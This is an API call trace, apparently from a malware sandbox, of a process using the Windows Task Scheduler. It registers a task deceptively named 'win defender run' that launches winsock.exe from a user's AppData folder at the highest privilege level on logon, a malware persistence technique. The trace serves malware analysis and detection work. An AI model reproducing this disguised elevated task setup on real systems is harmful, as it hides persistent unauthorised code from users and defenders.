LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0189.272] lstrlenW (lpString="Fourth") returned 6 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0189.272] lstrlenW (lpString="Last") returned 4 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0189.272] lstrlenW (lpString="First") returned 5 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0189.272] lstrlenW (lpString="Second") returned 6 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0189.272] lstrlenW (lpString="Third") returned 5 [0189.272] GetProcessHeap () returned 0x4780000 [0189.273] GetProcessHeap () returned 0x4780000 [0189.273] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ab10) returned 1 [0189.273] GetProcessHeap () returned 0x4780000 [0189.273] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ab10) returned 0xa [0189.273] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ab10) returned 1 [0189.273] GetProcessHeap () returned 0x4780000 [0189.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xc) returned 0x478abd0 [0189.273] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.273] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0189.273] lstrlenW (lpString="Fourth") returned 6 [0189.273] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.273] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0189.273] lstrlenW (lpString="Last") returned 4 [0189.273] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcde8, cchData=128 | out: lpLCData="0") returned 2 [0189.276] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.276] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0189.276] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0189.276] GetProcessHeap () returned 0x4780000 [0189.276] GetProcessHeap () returned 0x4780000 [0189.276] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ac48) returned 1 [0189.276] GetProcessHeap () returned 0x4780000 [0189.276] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ac48) returned 0x10 [0189.276] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ac48) returned 1 [0189.276] GetProcessHeap () returned 0x4780000 [0189.276] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x16) returned 0x47895f0 [0189.277] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcdec, cchData=128 | out: lpLCData="0") returned 2 [0189.277] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.277] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0189.277] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0189.277] GetProcessHeap () returned 0x4780000 [0189.277] GetProcessHeap () returned 0x4780000 [0189.277] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ac78) returned 1 [0189.277] GetProcessHeap () returned 0x4780000 [0189.277] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ac78) returned 0x10 [0189.277] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ac78) returned 1 [0189.277] GetProcessHeap () returned 0x4780000 [0189.277] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x16) returned 0x47893f0 [0189.277] GetLocalTime (in: lpSystemTime=0xdcfcc | out: lpSystemTime=0xdcfcc*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0xe, wMilliseconds=0x2e9)) [0189.277] GetLocalTime (in: lpSystemTime=0xdd480 | out: lpSystemTime=0xdd480*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0xe, wMilliseconds=0x2e9)) [0189.277] lstrlenW (lpString="") returned 0 [0189.277] lstrlenW (lpString="") returned 0 [0189.277] lstrlenW (lpString="") returned 0 [0189.277] lstrlenW (lpString="") returned 0 [0189.278] lstrlenW (lpString="") returned 0 [0189.278] lstrlenW (lpString="") returned 0 [0189.278] lstrlenW (lpString="") returned 0 [0189.278] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0189.284] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0189.295] CoCreateInstance (in: rclsid=0x3a26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3a26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x4713770) returned 0x0 [0189.315] TaskScheduler:ITaskService:Connect (This=0x4713770, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0189.357] TaskScheduler:ITaskService:GetFolder (in: This=0x4713770, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x4713898) returned 0x0 [0189.359] TaskScheduler:ITaskService:NewTask (in: This=0x4713770, flags=0x0, ppDefinition=0xdd474 | out: ppDefinition=0xdd474*=0x47138e8) returned 0x0 [0189.360] ITaskDefinition:get_Actions (in: This=0x47138e8, ppActions=0xdd3e8 | out: ppActions=0xdd3e8*=0x4713938) returned 0x0 [0189.360] IActionCollection:Create (in: This=0x4713938, Type=0, ppAction=0xdd3ec | out: ppAction=0xdd3ec*=0x4713b90) returned 0x0 [0189.361] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.361] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.361] lstrlenW (lpString=" ") returned 1 [0189.361] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0189.361] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x68) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x46) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x76) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x58) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0189.362] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x67) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.363] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x75) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x6b) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0189.364] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0189.364] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.364] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", wMatch=0x20) returned 0x0 [0189.364] RtlRestoreLastWin32Error () returned 0x490 [0189.364] IUnknown:Release (This=0x4713b90) returned 0x1 [0189.364] IUnknown:Release (This=0x4713938) returned 0x1 [0189.365] ITaskDefinition:get_Triggers (in: This=0x47138e8, ppTriggers=0xdcfb8 | out: ppTriggers=0xdcfb8*=0x4713ad8) returned 0x0 [0189.390] ITriggerCollection:Create (in: This=0x4713ad8, Type=9, ppTrigger=0xdcfcc | out: ppTrigger=0xdcfcc*=0x4713bd0) returned 0x0 [0189.390] IUnknown:QueryInterface (in: This=0x4713bd0, riid=0x3a13b4*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0xdcfb4 | out: ppvObject=0xdcfb4*=0x4713bd0) returned 0x0 [0189.391] IUnknown:Release (This=0x4713bd0) returned 0x2 [0189.391] _vsnwprintf (in: _Buffer=0xdcf3c, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xdcf1c | out: _Buffer="2021-09-28T12:17:00") returned 19 [0189.391] ITrigger:put_StartBoundary (This=0x4713bd0, StartBoundary="2021-09-28T12:17:00") returned 0x0 [0189.391] lstrlenW (lpString="") returned 0 [0189.391] lstrlenW (lpString="") returned 0 [0189.391] lstrlenW (lpString="") returned 0 [0189.391] lstrlenW (lpString="") returned 0 [0189.391] IUnknown:Release (This=0x4713bd0) returned 0x1 [0189.391] IUnknown:Release (This=0x4713ad8) returned 0x1 [0189.391] ITaskDefinition:get_Settings (in: This=0x47138e8, ppSettings=0xdd3f4 | out: ppSettings=0xdd3f4*=0x47139f0) returned 0x0 [0189.392] lstrlenW (lpString="") returned 0 [0189.392] IUnknown:Release (This=0x47139f0) returned 0x3 [0189.392] GetLocalTime (in: lpSystemTime=0xdd2e8 | out: lpSystemTime=0xdd2e8*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0xe, wMilliseconds=0x35b)) [0189.392] ResolveDelayLoadedAPI () returned 0x7462c5f0 [0189.392] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xdd2f8, nSize=0xdd2e0 | out: lpNameBuffer="XC64ZB\\RDhJ0CNFevzX", nSize=0xdd2e0) returned 0x1 [0189.393] ITaskDefinition:get_RegistrationInfo (in: This=0x47138e8, ppRegistrationInfo=0xdd2e4 | out: ppRegistrationInfo=0xdd2e4*=0x4713980) returned 0x0 [0189.393] IRegistrationInfo:put_Author (This=0x4713980, Author="XC64ZB\\RDhJ0CNFevzX") returned 0x0 [0189.393] _vsnwprintf (in: _Buffer=0xdd2f8, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xdd2b8 | out: _Buffer="2021-09-28T12:17:14") returned 19 [0189.393] IRegistrationInfo:put_Date (This=0x4713980, Date="2021-09-28T12:17:14") returned 0x0 [0189.393] IUnknown:Release (This=0x4713980) returned 0x1 [0189.394] malloc (_Size=0xc) returned 0x4713c60 [0189.394] free (_Block=0x4713c60) [0189.394] lstrlenW (lpString="") returned 0 [0189.394] ITaskDefinition:get_Principal (in: This=0x47138e8, ppPrincipal=0xdd47c | out: ppPrincipal=0xdd47c*=0x4713b18) returned 0x0 [0189.394] IPrincipal:put_RunLevel (This=0x4713b18, RunLevel=1) returned 0x0 [0189.394] IUnknown:Release (This=0x4713b18) returned 0x1 [0189.394] malloc (_Size=0xc) returned 0x4713c60 [0189.394] ITaskFolder:RegisterTaskDefinition (in: This=0x4713898, Path="win defender run", pDefinition=0x47138e8, flags=6, UserId=0xdd3d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xdd3fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdd444 | out: ppTask=0xdd444*=0x47129d8) returned 0x0 [0191.648] free (_Block=0x4713c60) [0191.648] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0191.648] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0191.648] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0191.648] GetProcessHeap () returned 0x4780000 [0191.648] GetProcessHeap () returned 0x4780000 [0191.648] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478abb8) returned 1 [0191.648] GetProcessHeap () returned 0x4780000 [0191.648] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478abb8) returned 0xe [0191.649] GetProcessHeap () returned 0x4780000 [0191.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x82) returned 0x479a138 [0191.649] _vsnwprintf (in: _Buffer=0xdd898, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdd40c | out: _Buffer="SUCCESS: The scheduled task \"win defender run\" has successfully been created.\n") returned 78 [0191.649] __iob_func () returned 0x75731208 [0191.649] _fileno (_File=0x75731228) returned 1 [0191.649] _errno () returned 0x47105b0 [0191.649] _get_osfhandle (_FileHandle=1) returned 0x3c [0191.649] _errno () returned 0x47105b0 [0191.649] GetFileType (hFile=0x3c) returned 0x2 [0191.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.649] GetFileType (hFile=0x3c) returned 0x2 [0191.649] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdd3e0 | out: lpMode=0xdd3e0) returned 1 [0191.730] __iob_func () returned 0x75731208 [0191.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0191.730] lstrlenW (lpString="SUCCESS: The scheduled task \"win defender run\" has successfully been created.\n") returned 78 [0191.730] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdd898*, nNumberOfCharsToWrite=0x4e, lpNumberOfCharsWritten=0xdd404, lpReserved=0x0 | out: lpBuffer=0xdd898*, lpNumberOfCharsWritten=0xdd404*=0x4e) returned 1 [0191.810] IUnknown:Release (This=0x47129d8) returned 0x0 [0191.810] TaskScheduler:IUnknown:Release (This=0x47138e8) returned 0x0 [0191.810] TaskScheduler:IUnknown:Release (This=0x4713898) returned 0x0 [0191.810] TaskScheduler:IUnknown:Release (This=0x4713770) returned 0x0 [0191.810] lstrlenW (lpString="") returned 0 [0191.810] GetProcessHeap () returned 0x4780000 [0191.810] GetProcessHeap () returned 0x4780000 [0191.810] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789dc0) returned 1 [0191.810] GetProcessHeap () returned 0x4780000 [0191.810] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789dc0) returned 0x1fc [0191.810] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789dc0) returned 1 [0191.810] GetProcessHeap () returned 0x4780000 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789630) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789630) returned 0x16 [0191.811] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789630) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ab70) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ab70) returned 0x10 [0191.811] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ab70) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789490) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789490) returned 0x14 [0191.811] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789490) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47869e8) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47869e8) returned 0xa0 [0191.811] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47869e8) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] GetProcessHeap () returned 0x4780000 [0191.811] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787488) returned 1 [0191.811] GetProcessHeap () returned 0x4780000 [0191.812] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787488) returned 0x10 [0191.812] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787488) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789370) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789370) returned 0x14 [0191.812] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789370) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478b3d8) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478b3d8) returned 0x72 [0191.812] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478b3d8) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ab28) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ab28) returned 0x10 [0191.812] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ab28) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789670) returned 1 [0191.812] GetProcessHeap () returned 0x4780000 [0191.812] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789670) returned 0x14 [0191.813] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789670) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478adb0) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478adb0) returned 0x76 [0191.813] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478adb0) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478aa08) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478aa08) returned 0x10 [0191.813] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478aa08) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789430) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789430) returned 0x14 [0191.813] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789430) returned 1 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] GetProcessHeap () returned 0x4780000 [0191.813] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787338) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787338) returned 0xc [0191.814] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787338) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787320) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787320) returned 0x10 [0191.814] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787320) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895d0) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47895d0) returned 0x14 [0191.814] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47895d0) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4788ce8) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4788ce8) returned 0x208 [0191.814] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4788ce8) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47873e0) returned 1 [0191.814] GetProcessHeap () returned 0x4780000 [0191.814] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47873e0) returned 0x10 [0191.814] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47873e0) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789390) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789390) returned 0x14 [0191.815] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789390) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478a7a0) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478a7a0) returned 0x200 [0191.815] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478a7a0) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787380) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787380) returned 0x10 [0191.815] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787380) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47894b0) returned 1 [0191.815] GetProcessHeap () returned 0x4780000 [0191.815] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47894b0) returned 0x14 [0191.816] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47894b0) returned 1 